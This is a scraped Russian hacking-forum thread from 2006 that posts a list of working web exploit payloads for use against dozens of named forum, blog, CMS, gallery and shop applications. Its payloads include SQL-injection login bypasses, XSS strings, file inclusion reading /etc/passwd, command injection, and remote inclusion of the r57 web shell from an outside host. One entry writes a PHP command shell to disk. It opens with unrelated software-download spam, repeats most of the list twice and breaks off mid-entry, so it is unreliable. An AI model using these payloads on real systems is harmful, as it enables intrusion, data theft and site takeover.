Http Smarturl.it Rar Password Password Chrome 10.5 8 Mac Download Torrent Autocad 2010 For Mac Os Ms Publisher For Mac Free Download Adt Bundle Mac Download Microsoft Media Player Download For Mac Free Apps For Macbook Pro 2015 Hearts For Mac Free Download Instagram For Mac Pro Free Download.
Вот нашёл в интернете вот такой список багов пользуйтесь:
Форумы
phpBB v.2.0.15 Выполнение php кода в viewtopic.php
viewtopic.php?t=1&highlight='.printf(md5(test)).'
PBLang 4.65 Локальный include файлов
setcookie.php?u=././././././././././etc/passwd%00
setcookie.php??u=././././././././././boot.ini%00
PHPTB v.2.0 Include файлов
/classes/admin_o.php?absolutepath= [Ссылки могут видеть только зарегистрированные пользователи.]
r57shell.txt
MailGust v.1.9 SQL Injection
post запрос index.php
method=remind_password&list=maillistuser&fromlist= maillist&frommethod=showhtmllist&email=1%27%
20union%20select%20%2A%20from%20force_sql_error%2F %2A%40hotmail%2Ecom&submit=Ok&showAvatar
Chipmunk Forum XSS
newtopic.php?forumID='%3C/a%3E%3CIFRAME%20SRC=javascript:alert(%2527xss%2527 )
%3E%3C/IFRAME%3E
oaboard v.1.0 SQL Injection
forum.php?channel=0%20union%20select%20*%20from%20 force_mysql_table_error
Phorum 5.0.20 SQL Injection
search.php?1,search=%20,page=1,match_type=ALL,matc h_dates=30,match_forum=ALL,body=
1,author=1,subject=1,&forum_ids[]=-99)/**/generate_sql_error
Cyphor 0.19 XSS
/include/footer.php?t_login=%3Cscript%3Ealert(%22XSS%22)%3C /script%3E
W-Agora 4.2.0 XSS
/templates/admin/login_form.php?msg_login=%3Cscript%3Ealert(%22XSS% 22)%3C/script%3E
WizForum 1.20 SQL Injection
ForumTopicDetails.php?TopicID=11111111%20union%20S elect%20*%20from%20EronatedInex
istentTable
EkinBoard 1.0.3 SQL Injection
admin/index.php ?page=general&step=2
Cookie: username=%27or+isnull%281%2F0%29+AND+level%3D3%2F% 2A; password=
Snitz Forums 2000 v.3.4.05 XSS
post.asp ?method=Topic&FORUM_ID=1&CAT_ID=1&type=xss-${random}
PHP-Post 1.0 XSS
profile.php ?user='%3CIFRAME%20SRC=javascript:alert(%2527xss-${random}%2527)%3E%3
C/IFRAME%3E
WSN Forum 1.21 SQL Injection
memberlist.php ?action=profile&id=1'%20select%20*%20from%20force_ mysql_warning
sCssBoard 1.12 XSS
index.php ?act=search-results
post search_term=%3Cscript%3Ealert%28%27wvs-${random}%27%29%3C%2Fscript%3E+&sortby=relevancy
freeForum 1.1 SQL Injection
forum.php?mode=thread&thread=force_mysql_fetch_obj ect_warning
Orca Forum 4.3.b SQL Injection
forum.php ?msg=2'force_mysql_num_rows_warning
Pearl Forums 2.4 SQL Injection
index.php ?mode=forums&forumId=1%20union%20select%20*%20from %20force_erro r
SimpleBBS v.1.1 Выполнение php кода
index.php ?v=newtopic&c=1
POST name=<?php echo md5('test');?>&subject=mysubject&message=mymessage &sendTopic=Send
ADP Forum v.2.0.2 Информация о пользователя
/users/
ADN Forum v.1.0b SQL Injection
verpag.php?pagid=999'%20and_force_mysql_error/*
MyBuletinBoard v.1.0.2 Раскрытие префикса таблицы
search.php?s=de1aaf9b&action=do_search&keywords=a& srchtype=3
MyTopix v.1.2.3 SQL Injection и раскрытие пути срипта
/modules/logon.mod.php
Pentacle In-Out Board v.6.03.0.0080 SQL Injection
login.asp POST username=anypassword&userpassword=%27+or+%271%27%3 D%271&Submit=Log+in
Battleaxe Software Forums v.2.0 XSS
failure.asp ?err_txt=text%3C/b%3E%3Cscript%3Ealert(%22xss-${random}%22);%3C/script%3E%3Cb%3Etext
PHP Библиотеки
PEAR XML_RPC 1.3.0 Выполнение команд (подвержены Affected PEAR XML_RPC versions (up to 1.3.0). Affected web applications:TikiWiki. PostNuke
Drupal. b2evolution. b2. phpGroupWare. eGroupware. Serendipity Weblog. phpAdsNew. Max Media Manager. phpWiki. Blog:CMS. CivicSpace )
xmlrpc.php xmlrpc/server.php serendipity_xmlrpc.php adxmlrpc.php nucleus/xmlrpc/server.php
POST <?xmlversion='1.0'?><methodCall><methodName>test.m ethod</methodName><params><param><value><name>',')); printf(md5(acunetix_wvs_security_test)); exit;//</name></value></param></params></methodCall>
ADOdb
1) SQL Injection
/server.php?sql=SELECT '[content]' INTO OUTFILE '[file]'
2) Выполнение функции php
/tests/tmssql.php?do=phpinfo
Network tools
phpLDAPadmin 0.9.6 Выполнение php кода
welcome.php ?custom_welcome_page= [Ссылки могут видеть только зарегистрированные пользователи.]
Netquery [host] Произвольное выполнение команд
nquser.php POST
1) querytype=dig&host=a%27%7Ccat%20%27%2Fetc%2Fpasswd &digparam=ANY&x=11&y=17
2) querytype=dig&host=%7Ccat%20%2Fetc%2Fpasswd&digpar am=ANY&x=11&y=17
Календари и Планировщики
phpCommunityCalendar v.4.0.3 Обход Логина
webadmin/login.php POST Username=%27+or+isnull%281%2F0%29+%2F*&Password=&R eturned=1
Calendarix v.1.6 SQL Injection
cal_login.php POST login=%27+or+isnull%281%2F0%29%2F*&password=any
Teca Diary Personal Edition v.1.0 SQL Injection
index.php?mm='%20force_sql_error&yy=2006
CALimba v.0.99.2 Sql Injection
index.php POST ute_login=%27%29+or+isnull%281%2F0%29%2F*&ute_pass word=anypassword&cmdOK=Login%21
Maian Events v.1.00 SQL Injection
menu.php?month='forceerror'
Блоки новостей
myBloggie 2.1.3 SQL Injection
login.php POST username=%27+or+isnull%281%2F0%29+%2F*&passwd=&sub mit=Log+In
Simplog 0.9.1 SQL Injection
archive.php?blogid=force_error_for_test_reason
Zomplog 3.4 XSS
get.php?username=%3Cbr%3E%3Cb%3Exss%3C/b%3E%3Cbr%3E
CuteNews 1.4.1 Shell Injection
show_archives.php ?template=./inc/ipban.mdu%00&member_db[1]=1&action=add&add_ip=%22%3C?php%20echo%20md5(%22te st%22)
;%20die;?%3E.%22%20HTTP/1.0rn
Cute News 1.4.1 Local File Inclusion
show_archives.php?template=././././././././././etc/passwd%00
show_archives.php?template=././././././././././boot.ini%00
SimpleBlog v.2.1 SQL Injection
default.asp ?view=archives&month=%22generate_error&year=2004
Bit5blog v.8.1 SQL Injection
admin/processlogin.php POST username=%27+or+isnull%281%2F0%29%2F*&password=%27 +or+isnull%281%2F0%29%2F*
WebspotBlogging v.3.0 SQL Injection
login.php POST username=%27+or+isnull%281%2F0%29%2F*&password=any password
e-moBLOG v.1.3 SQL Injection
/admin/index.php POST login=aaa%27+union+select+%27bbb%27%2C+%27161da2fa 81d32d4071ee16f7f77cb463%27%2F*&password=
any_password
miniBloggie v.1.0 SQL Injection
login.php POST user=%27+or+isnull%281%2F0%29%2F*&pwd=%27+or+isnul l%281%2F0%29%2F*&submit=Log+In
Text Rider v.2.4 Список пользователей
/data/userlist.txt
AndoNET Blog SQL Injection
index.php?ando=comentarios&entrada=1'generate%20er ror
Loudblog v.0.4 PHP Code Injection
/loudblog/inc/backend_settings.php?GLOBALS[path]= [Ссылки могут видеть только зарегистрированные пользователи.]
PluggedOut Blog v.1.9.9c SQL Injection
exec.php?action=comment_add&entryid=force_error
Clever Copy v.3.0 SQL Injection
mailarticle.php?ID='UNION%20SELECT%200,0,0,0,0,0,u sername,password,0,0,0,0,0,0,0,0,0
%20FROM%20CC_admin/*
Magic News Lite v.1.2.3 Code Injection
preview.php?php_script_path=http://rst.void.ru/download/r57shell.txt
WordPress v.2.0.1 Раскрытие пути
/wp-includes/default-filters.php
sBlog v.0.7.2 XSS
search.php POST keyword=%3Cscript%3Ealert%28%22wvs-xss-magic-string-${random}%22%29%3B%3C%2Fscript%3E
Maian Weblog v.2.0 SQL Injection
print.php?cmd=log&entry=1'%20or%20generate_error=2
Faq Systems
phpMyFAQ 1.5.1 SQL Injection
admin/password.php POST username=%27+or+isnull%281%2F0%29+%2F*&email=1@2.c om
A-FAQ 1.0 SQL Injection
faqDsp.asp?catcode=12%20union%20select%20name%20fr om%20msysobjects%20in%20'nopath
sqlerr
Atlantis Knowledge Base Software v.3.0 SQL Injection
search.php POST searchStr=%25%27+union+select+*+from+force_mysql_w arning%2F*
ASP Survey v1.10 SQL Injection
/Admin/Login_Validate.asp POST Username=admin&Password=%27or%27&Dest=http%3A%2F%2 Fasp.loftin-nc.com%2FASPSurvey%2FDemo%2FAdmin%2
FDefault.asp
Owl v.0.82 File Inclusion
/lib/OWL_API.php?xrms_file_root=nonexistent_test_includ efile%00
Web Portals
PHPNuke 7.8 Remote Directory Traversal
modules.php?name=Search&file=././././././././././etc/passwd%00
modules.php?name=Search&file=./././././././././././boot.ini%00
Партнерские системы
TWiki rev Parameter Remote Command Execution Vulnerability
view/Main/TWikiUsers?rev=2%20%7Cless%20/etc/passwd
view/Main/TWikiUsers?rev%3D2%20%7Ctype%20%5Cboot%2Eini
PmWiki 2.0.12 q-Parameter XSS
pmwiki.php ?n=Site.Search?action=search&q=test_search_item%27 %20onMouseOver%3D%27alert%28% 22wvs-xss-magic
-string-${random}%22%29%3B%27%20
ProjectApp v.3.3 XSS
default.asp ?skin_number=XSS.css%22%3E%3Cscript%3Ealert('wvs-xss-magic-string-${random}')%3C/script%3E%3C
IntranetApp v.3.3 XSS
login.asp ?ret_page=a%22%3E%3Cscript%3Ealert('xss-${random}')%3C/script%3E%3C%22
dotproject v.2.0.1 File Inclusion
includes/db_adodb.php?baseDir=http://rst.void.ru/download/r57shell.txt
Qwiki v.1.5.1 XSS
index.php?page=Home&from='%3Cscript%3Ealert(%22xss-${random}%22)%3C/script%3E
Administration Tools
phpMyAdmin grab_globals.lib.php
libraries/grab_globals.lib.php POST usesubform[1]=1&usesubform[2]=1&subform[1][Whiteirect]=${file}/./././././././
./././etc/passwd&subform[1]
libraries/grab_globals.lib.php POST
usesubform[1]=1&usesubform[2]=1&subform[1][Whiteirect]=${file}/./././././././
./././boot.ini&subform[1]
phpMyAdmin XSS
queryframe.php?lang=en-iso-8859-1&server=1&hash='>='%3C/a%3E%3CIFRAME%
20SRC=javascript:alert(%2527xss%2527)%3E%3C/IFRAME%3E
phpMyAdmin Раскрытие пути
libraries/charset_conversion.lib.php ?cfg[AllowAnywhereRecoding]=true&
allow_recoding=true)
CMS Systems
PHP-Fusion 6.00.109 SQL Injection
faq.php?cat_id=1%27%20or%20force_mysql_error%3D%27 2
MySource 2.14.0 File Inclusion
init_mysource.php ?INCLUDE_PATH=http://rst.void.ru/download/r57shell.txt
e107 v0617 SQL Injection
e107_files/resetcore.php POST a_name=%27+or+isnull%281%2F0%29%2F*&a_password=&us ubmit=Continue
lucidCMS 1.0.11 SQL Injection
index.php?command=panel
PhpWebThings 1.4.4 SQL Injection
forum.php?forum=-1%20union%20select%20password,password,null,null%2 0from%
20test_mysql_injection%20where%20uid=1/*
Envolution v.1.1.0 SQL Injection
modules.php?op=modload&name=News&file=index&catid= %221%22%20AND%20force_error=error
Acidcat v.2.1.13 SQL Injection
default.asp?ID=26%20union%20select%201,2,2,3,passw ord,5,6%20from%20Configuration
DEV v1.5 SQL Injection
index.php?session=0&action=openforum&cat=force_err or
SiteEnable v.3.3 XSS
login.asp?ret_page=a%22%3E%3Cscript%3Ealert('xss-${random}')%3C/script%3E%3C%22
PortalApp v.3.3 XSS
login.asp?ret_page=a%22%3E%3Cscript%3Ealert('xss-${random}')%3C/script%3E%3C%22
Typo3 v.3.8.1 Раскрытие пути
/tslib/showpic.php
RunCMS v.1.3a5 XSS
/modules/mydownloads/ratefile.php?lid=1%22%3E%3Cscript%3Ealert('xss-${random}');
%3C/script%3E%3Cbr%20name=%22nothing
Mambo v.4.5.3h SQL Injection
/index.php POST username=%27or+isnull%281%2F0%29%2F*&passwd=anypas sword&option=login&Submit=Login&op2=login&lang
=english&return=${file}&message=0
Dragonfly CMS v.9.0.6.1 XSS
/index.php POST search=%22%3E%3Cscript%3Ealert%28%22wvs-xss-magic-string-${random}%22%29%3C%2Fscript%3E&topic=0&cat
=0&news_search_comments=0&coppermine=
Nodez v.4.6.1.1 XSS
/index.php?node=system&op=block%3Cscript%3Ealert(%2 2wvs-xss-magic-string-${random}%22)
%3C/script%3E&block=3&bop=more
XOOPS v.2.0.11 SQL Injection
/xmlrpc.php POST <?xml version='1.0'?><methodCall><methodName>blogger.get UsersBlogs</methodName><params><param><value>
<string></string></value></param><param><value><string>any') or isnull(1/0)/*</string></value></param></params></methodCall>
Gallery Applications
Gallery 'g2_itemId' локальный иклуид
main.php?g2_itemId=/./././././././././././boot.ini%00
main.php?g2_itemId=/./././././././././././etc/passwd%00
/upgrade/index.php ?stepOrder[]=././././././././include_inexistent_file.txt%00
Coppermine Photo Gallery v.1.4.2 игнорировать конфигурацию
relocate_server.php POST continue=1
Instant Photo Gallery v.1.0 SQL Injection
portfolio.php?cat_id='force_sql_error
Enhanced Simple PHP Gallery v.1.7 Раскрытие пути
index.php?dir=inexistent_directory
WhiteAlbum v.2.5 SQL Injection
pictures.php?dir=force_mysql_warning
LinPHA v.1.0 Local File Inclusion
/docs/index.php?lang=/././././././././././etc/passwd%00
/docs/index.php?lang=/././././././././././boot.ini%00
Script Collections
Codegrrl Arbitrary Local File Inclusion
protection.php?action=logout&siteurl=././././././././././etc/passwd%00
protection.php?action=logout&siteurl=././././././././././boot.ini%00
Techno Dreams Products SQL Injection
admin/login.asp POST userid=%27union+all+select+%271%27%2C%271%27+from+ admin+where+%27%27%3D%27&passwd=1&submit=Login
AlstraSoft Template Seller Pro 3.25 File Inclusion
include/paymentplugins/payment_paypal.php?config[basepath]=inexistent_hacker_box
AlstraSoft Affiliate Network Pro v.7.2 SQL Injection
admin/admin_login_validate.php POST login=%27+or+isnull%281%2F0%29+%2F*&passwd=&B1=Log in
OpenEdit v.4.0 XSS
/store/search/results.html ?page=%3Ciframe%3Exss-${random}%3C/iframe%3E
Электронная коммерция
Zend Cart 1.2.6 SQL Injection
admin/password_forgotten.php POST admin_email=%27UNION+SELECT+0%2C0%2C%27%3C%3Fphp+s ystem%28%24_GET%5Bcmd%5D%29%3B+%3F%3E%27%2C0
+INTO+OUTFILE+%27shell.php%27+FROM+force_table_err or%2F*&submit=resend
Lizard Cart CMS v.1.0.4 SQL Injection
detail.php?id=-1'
My Amazon Store Manager v1.0 XSS
/search.php ?q=%3Cscript%3Ealert('xss-${random}')%3C/script%3E&Mode=apparel
CRE Loaded v.6.15 XSS
/admin/htmlarea/popups/file/files.php?q=%3Cscript%3Ealert('xss-${random}')%3C/
script%3E&Mode=apparel
NZ Ecommerce SQL Injection
/index.php?action=Information&informationID=1%20and %20generate_error=error
Guest Book Applications
Ades Guestbook v.2.0 XSS
read.php ?pageNum_rsRead=1&totalRows_rsRead=%3Cscript%3Eale rt%28%27wvs-xss-magic-string-${random}%27%29%3
C%2Fscript%3E
ph0en1x добавил 07.06.2006 в 03:33
А вот ещё:
Development Tools
Mantis 1.00 File Inclusion
bug_sponsorship_list_view_inc.php?t_core_path=././././././././etc/passwd%00
bug_sponsorship_list_view_inc.php?t_core_path=./././././././././boot.ini%00
Flyspray 0.9.8 XSS
index.php ?tasks=all%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3 C%2Fscript%3E%26project%3D0
Gemini v.2.0 XSS
/issue/createissue.aspx?rtcDescription$RadEditor1=1><scri pt>alert(${random});</script>
Другие инструменты
Digital Scribe 1.4 SQL Injection
login.php POST username=%22+or+isnull%281%2F0%29+%2F*&pass1=&subm it=Login
ATUTOR 1.5.1 SQL Injection
password_reminder.php POST form_password_reminder=true&form_email=%27
PHP Advanced Transfer Manager System локальный include
viewers/txt.php?filename=././././././././././boot.ini%00
viewers/txt.php?filename=././././././././././etc/passwd%00
Chipmunk Topsites XSS
recommend.php ?ID='%3C/a%3E%3CIFRAME%20SRC=javascript:alert(%2527xss%2527 )%3E%3C/IFRAME%3E
Chipmunk Directory XSS
recommend.php ?entryID='%3C/a%3E%3CIFRAME%20SRC=javascript:alert(%2527xss%2527 )%3E%3C/IFRAME%3E
Gcards 1.44 limit parameter SQL Injection
news.php ?limit=force_sql_error
phpSysInfo 2.3 XSS
index.php ?VERSION=%22%3E%3Cscript%3Ealert('FORCE_XSS')%3C/script%3E
Advanced Poll 2.03 XSS
popup.php ?poll_ident=%3Cscript%3Ealert(%22wvs-xss-magic-string-${random}%22)%3C/script%3E
PHPGreetz 0.99 Remote File Include
content.php?content=http://rst.void.ru/download/r57shell.txt
eFiction 1.1 XSS и SQL Injection
titles.php?action=viewlist&let='%20UNION%20SELECT% 200,0,'%3Cscript%3Ealert(%2 2wvs-xss-magic-string-${random}%22)%3C/script%3E',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,pen name,0%20FROM%20fanfiction_authors%20/*
Google API Search Engine v.1.3.1 XSS
index.php?REQ=%3Cscript%3Ealert%28%27wvs-xss-magic-string-${random}%27%29%3C%2Fscript%3ESubmit=Submit
phpArcadeScript v.2.0 XSS
/includes/tellafriend.php?about=game&gamename=%3Cscript%3Eal ert(${random});%3C/script%3E
ph0en1x добавил 07.06.2006 в 03:35
Найдено мною на Античате.
Форумы
phpBB v.2.0.15 Выполнение php кода в viewtopic.php
viewtopic.php?t=1&highlight='.printf(md5(test)).'
PBLang 4.65 Локальный include файлов
setcookie.php?u=././././././././././etc/passwd%00
setcookie.php??u=././././././././././boot.ini%00
PHPTB v.2.0 Include файлов
/classes/admin_o.php?absolutepath= [Ссылки могут видеть только зарегистрированные пользователи.]
r57shell.txt
MailGust v.1.9 SQL Injection
post запрос index.php
method=remind_password&list=maillistuser&fromlist= maillist&frommethod=showhtmllist&email=1%27%
20union%20select%20%2A%20from%20force_sql_error%2F %2A%40hotmail%2Ecom&submit=Ok&showAvatar
Chipmunk Forum XSS
newtopic.php?forumID='%3C/a%3E%3CIFRAME%20SRC=javascript:alert(%2527xss%2527 )
%3E%3C/IFRAME%3E
oaboard v.1.0 SQL Injection
forum.php?channel=0%20union%20select%20*%20from%20 force_mysql_table_error
Phorum 5.0.20 SQL Injection
search.php?1,search=%20,page=1,match_type=ALL,matc h_dates=30,match_forum=ALL,body=
1,author=1,subject=1,&forum_ids[]=-99)/**/generate_sql_error
Cyphor 0.19 XSS
/include/footer.php?t_login=%3Cscript%3Ealert(%22XSS%22)%3C /script%3E
W-Agora 4.2.0 XSS
/templates/admin/login_form.php?msg_login=%3Cscript%3Ealert(%22XSS% 22)%3C/script%3E
WizForum 1.20 SQL Injection
ForumTopicDetails.php?TopicID=11111111%20union%20S elect%20*%20from%20EronatedInex
istentTable
EkinBoard 1.0.3 SQL Injection
admin/index.php ?page=general&step=2
Cookie: username=%27or+isnull%281%2F0%29+AND+level%3D3%2F% 2A; password=
Snitz Forums 2000 v.3.4.05 XSS
post.asp ?method=Topic&FORUM_ID=1&CAT_ID=1&type=xss-${random}
PHP-Post 1.0 XSS
profile.php ?user='%3CIFRAME%20SRC=javascript:alert(%2527xss-${random}%2527)%3E%3
C/IFRAME%3E
WSN Forum 1.21 SQL Injection
memberlist.php ?action=profile&id=1'%20select%20*%20from%20force_ mysql_warning
sCssBoard 1.12 XSS
index.php ?act=search-results
post search_term=%3Cscript%3Ealert%28%27wvs-${random}%27%29%3C%2Fscript%3E+&sortby=relevancy
freeForum 1.1 SQL Injection
forum.php?mode=thread&thread=force_mysql_fetch_obj ect_warning
Orca Forum 4.3.b SQL Injection
forum.php ?msg=2'force_mysql_num_rows_warning
Pearl Forums 2.4 SQL Injection
index.php ?mode=forums&forumId=1%20union%20select%20*%20from %20force_erro r
SimpleBBS v.1.1 Выполнение php кода
index.php ?v=newtopic&c=1
POST name=<?php echo md5('test');?>&subject=mysubject&message=mymessage &sendTopic=Send
ADP Forum v.2.0.2 Информация о пользователя
/users/
ADN Forum v.1.0b SQL Injection
verpag.php?pagid=999'%20and_force_mysql_error/*
MyBuletinBoard v.1.0.2 Раскрытие префикса таблицы
search.php?s=de1aaf9b&action=do_search&keywords=a& srchtype=3
MyTopix v.1.2.3 SQL Injection и раскрытие пути срипта
/modules/logon.mod.php
Pentacle In-Out Board v.6.03.0.0080 SQL Injection
login.asp POST username=anypassword&userpassword=%27+or+%271%27%3 D%271&Submit=Log+in
Battleaxe Software Forums v.2.0 XSS
failure.asp ?err_txt=text%3C/b%3E%3Cscript%3Ealert(%22xss-${random}%22);%3C/script%3E%3Cb%3Etext
PHP Библиотеки
PEAR XML_RPC 1.3.0 Выполнение команд (подвержены Affected PEAR XML_RPC versions (up to 1.3.0). Affected web applications:TikiWiki. PostNuke
Drupal. b2evolution. b2. phpGroupWare. eGroupware. Serendipity Weblog. phpAdsNew. Max Media Manager. phpWiki. Blog:CMS. CivicSpace )
xmlrpc.php xmlrpc/server.php serendipity_xmlrpc.php adxmlrpc.php nucleus/xmlrpc/server.php
POST <?xmlversion='1.0'?><methodCall><methodName>test.m ethod</methodName><params><param><value><name>',')); printf(md5(acunetix_wvs_security_test)); exit;//</name></value></param></params></methodCall>
ADOdb
1) SQL Injection
/server.php?sql=SELECT '[content]' INTO OUTFILE '[file]'
2) Выполнение функции php
/tests/tmssql.php?do=phpinfo
Network tools
phpLDAPadmin 0.9.6 Выполнение php кода
welcome.php ?custom_welcome_page= [Ссылки могут видеть только зарегистрированные пользователи.]
Netquery [host] Произвольное выполнение команд
nquser.php POST
1) querytype=dig&host=a%27%7Ccat%20%27%2Fetc%2Fpasswd &digparam=ANY&x=11&y=17
2) querytype=dig&host=%7Ccat%20%2Fetc%2Fpasswd&digpar am=ANY&x=11&y=17
Календари и Планировщики
phpCommunityCalendar v.4.0.3 Обход Логина
webadmin/login.php POST Username=%27+or+isnull%281%2F0%29+%2F*&Password=&R eturned=1
Calendarix v.1.6 SQL Injection
cal_login.php POST login=%27+or+isnull%281%2F0%29%2F*&password=any
Teca Diary Personal Edition v.1.0 SQL Injection
index.php?mm='%20force_sql_error&yy=2006
CALimba v.0.99.2 Sql Injection
index.php POST ute_login=%27%29+or+isnull%281%2F0%29%2F*&ute_pass word=anypassword&cmdOK=Login%21
Maian Events v.1.00 SQL Injection
menu.php?month='forceerror'
Блоки новостей
myBloggie 2.1.3 SQL Injection
login.php POST username=%27+or+isnull%281%2F0%29+%2F*&passwd=&sub mit=Log+In
Simplog 0.9.1 SQL Injection
archive.php?blogid=force_error_for_test_reason
Zomplog 3.4 XSS
get.php?username=%3Cbr%3E%3Cb%3Exss%3C/b%3E%3Cbr%3E
CuteNews 1.4.1 Shell Injection
show_archives.php ?template=./inc/ipban.mdu%00&member_db[1]=1&action=add&add_ip=%22%3C?php%20echo%20md5(%22te st%22)
;%20die;?%3E.%22%20HTTP/1.0rn
Cute News 1.4.1 Local File Inclusion
show_archives.php?template=././././././././././etc/passwd%00
show_archives.php?template=././././././././././boot.ini%00
SimpleBlog v.2.1 SQL Injection
default.asp ?view=archives&month=%22generate_error&year=2004
Bit5blog v.8.1 SQL Injection
admin/processlogin.php POST username=%27+or+isnull%281%2F0%29%2F*&password=%27 +or+isnull%281%2F0%29%2F*
WebspotBlogging v.3.0 SQL Injection
login.php POST username=%27+or+isnull%281%2F0%29%2F*&password=any password
e-moBLOG v.1.3 SQL Injection
/admin/index.php POST login=aaa%27+union+select+%27bbb%27%2C+%27161da2fa 81d32d4071ee16f7f77cb463%27%2F*&password=
any_password
miniBloggie v.1.0 SQL Injection
login.php POST user=%27+or+isnull%281%2F0%29%2F*&pwd=%27+or+isnul l%281%2F0%29%2F*&submit=Log+In
Text Rider v.2.4 Список пользователей
/data/userlist.txt
AndoNET Blog SQL Injection
index.php?ando=comentarios&entrada=1'generate%20er ror
Loudblog v.0.4 PHP Code Injection
/loudblog/inc/backend_settings.php?GLOBALS[path]= [Ссылки могут видеть только зарегистрированные пользователи.]
PluggedOut Blog v.1.9.9c SQL Injection
exec.php?action=comment_add&entryid=force_error
Clever Copy v.3.0 SQL Injection
mailarticle.php?ID='UNION%20SELECT%200,0,0,0,0,0,u sername,password,0,0,0,0,0,0,0,0,0
%20FROM%20CC_admin/*
Magic News Lite v.1.2.3 Code Injection
preview.php?php_script_path=http://rst.void.ru/download/r57shell.txt
WordPress v.2.0.1 Раскрытие пути
/wp-includes/default-filters.php
sBlog v.0.7.2 XSS
search.php POST keyword=%3Cscript%3Ealert%28%22wvs-xss-magic-string-${random}%22%29%3B%3C%2Fscript%3E
Maian Weblog v.2.0 SQL Injection
print.php?cmd=log&entry=1'%20or%20generate_error=2
Faq Systems
phpMyFAQ 1.5.1 SQL Injection
admin/password.php POST username=%27+or+isnull%281%2F0%29+%2F*&email=1@2.c om
A-FAQ 1.0 SQL Injection
faqDsp.asp?catcode=12%20union%20select%20name%20fr om%20msysobjects%20in%20'nopath
sqlerr
Atlantis Knowledge Base Software v.3.0 SQL Injection
search.php POST searchStr=%25%27+union+select+*+from+force_mysql_w arning%2F*
ASP Survey v1.10 SQL Injection
/Admin/Login_Validate.asp POST Username=admin&Password=%27or%27&Dest=http%3A%2F%2 Fasp.loftin-nc.com%2FASPSurvey%2FDemo%2FAdmin%2
FDefault.asp
Owl v.0.82 File Inclusion
/lib/OWL_API.php?xrms_file_root=nonexistent_test_includ efile%00
Web Portals
PHPNuke 7.8 Remote Directory Traversal
modules.php?name=Search&file=././././././././././etc/passwd%00
modules.php?name=Search&file=./././././././././././boot.ini%00
Партнерские системы
TWiki rev Parameter Remote Command Execution Vulnerability
view/Main/TWikiUsers?rev=2%20%7Cless%20/etc/passwd
view/Main/TWikiUsers?rev%3D2%20%7Ctype%20%5Cboot%2Eini
PmWiki 2.0.12 q-Parameter XSS
pmwiki.php ?n=Site.Search?action=search&q=test_search_item%27 %20onMouseOver%3D%27alert%28% 22wvs-xss-magic
-string-${random}%22%29%3B%27%20
ProjectApp v.3.3 XSS
default.asp ?skin_number=XSS.css%22%3E%3Cscript%3Ealert('wvs-xss-magic-string-${random}')%3C/script%3E%3C
IntranetApp v.3.3 XSS
login.asp ?ret_page=a%22%3E%3Cscript%3Ealert('xss-${random}')%3C/script%3E%3C%22
dotproject v.2.0.1 File Inclusion
includes/db_adodb.php?baseDir=http://rst.void.ru/download/r57shell.txt
Qwiki v.1.5.1 XSS
index.php?page=Home&from='%3Cscript%3Ealert(%22xss-${random}%22)%3C/script%3E
Administration Tools
phpMyAdmin grab_globals.lib.php
libraries/grab_globals.lib.php POST usesubform[1]=1&usesubform[2]=1&subform[1][Whiteirect]=${file}/./././././././
./././etc/passwd&subform[1]
libraries/grab_globals.lib.php POST
usesubform[1]=1&usesubform[2]=1&subform[1][Whiteirect]=${file}/./././././././
./././boot.ini&subform[1]
phpMyAdmin XSS
queryframe.php?lang=en-iso-8859-1&server=1&hash='>='%3C/a%3E%3CIFRAME%
20SRC=javascript:alert(%2527xss%2527)%3E%3C/IFRAME%3E
phpMyAdmin Раскрытие пути
libraries/charset_conversion.lib.php ?cfg[AllowAnywhereRecoding]=true&
allow_recoding=true)
CMS Systems
PHP-Fusion 6.00.109 SQL Injection
faq.php?cat_id=1%27%20or%20force_mysql_error%3D%27 2
MySource 2.14.0 File Inclusion
init_mysource.php ?INCLUDE_PATH=http://rst.void.ru/download/r57shell.txt
e107 v0617 SQL Injection
e107_files/resetcore.php POST a_name=%27+or+isnull%281%2F0%29%2F*&a_password=&us ubmit=Continue
lucidCMS 1.0.11 SQL Injection
index.php?command=panel
PhpWebThings 1.4.4 SQL Injection
forum.php?forum=-1%20union%20select%20password,password,null,null%2 0from%
20test_mysql_injection%20where%20uid=1/*
Envolution v.1.1.0 SQL Injection
modules.php?op=modload&name=News&file=index&catid= %221%22%20AND%20force_error=error
Acidcat v.2.1.13 SQL Injection
default.asp?ID=26%20union%20select%201,2,2,3,passw ord,5,6%20from%20Configuration
DEV v1.5 SQL Injection
index.php?session=0&action=openforum&cat=force_err or
SiteEnable v.3.3 XSS
login.asp?ret_page=a%22%3E%3Cscript%3Ealert('xss-${random}')%3C/script%3E%3C%22
PortalApp v.3.3 XSS
login.asp?ret_page=a%22%3E%3Cscript%3Ealert('xss-${random}')%3C/script%3E%3C%22
Typo3 v.3.8.1 Раскрытие пути
/tslib/showpic.php
RunCMS v.1.3a5 XSS
/modules/mydownloads/ratefile.php?lid=1%22%3E%3Cscript%3Ealert('xss-${random}');
%3C/script%3E%3Cbr%20name=%22nothing
Mambo v.4.5.3h SQL Injection
/index.php POST username=%27or+isnull%281%2F0%29%2F*&passwd=anypas sword&option=login&Submit=Login&op2=login&lang
=english&return=${file}&message=0
Dragonfly CMS v.9.0.6.1 XSS
/index.php POST search=%22%3E%3Cscript%3Ealert%28%22wvs-xss-magic-string-${random}%22%29%3C%2Fscript%3E&topic=0&cat
=0&news_search_comments=0&coppermine=
Nodez v.4.6.1.1 XSS
/index.php?node=system&op=block%3Cscript%3Ealert(%2 2wvs-xss-magic-string-${random}%22)
%3C/script%3E&block=3&bop=more
XOOPS v.2.0.11 SQL Injection
/xmlrpc.php POST <?xml version='1.0'?><methodCall><methodName>blogger.get UsersBlogs</methodName><params><param><value>
<string></string></value></param><param><value><string>any') or isnull(1/0)/*</string></value></param></params></methodCall>
Gallery Applications
Gallery 'g2_itemId' локальный иклуид
main.php?g2_itemId=/./././././././././././boot.ini%00
main.php?g2_itemId=/./././././././././././etc/passwd%00
/upgrade/index.php ?stepOrder[]=././././././././include_inexistent_file.txt%00
Coppermine Photo Gallery v.1.4.2 игнорировать конфигурацию
relocate_server.php POST continue=1
Instant Photo Gallery v.1.0 SQL Injection
portfolio.php?cat_id='force_sql_error
Enhanced Simple PHP Gallery v.1.7 Раскрытие пути
index.php?dir=inexistent_directory
WhiteAlbum v.2.5 SQL Injection
pictures.php?dir=force_mysql_warning
LinPHA v.1.0 Local File Inclusion
/docs/index.php?lang=/././././././././././etc/passwd%00
/docs/index.php?lang=/././././././././././boot.ini%00
Script Collections
Codegrrl Arbitrary Local File Inclusion
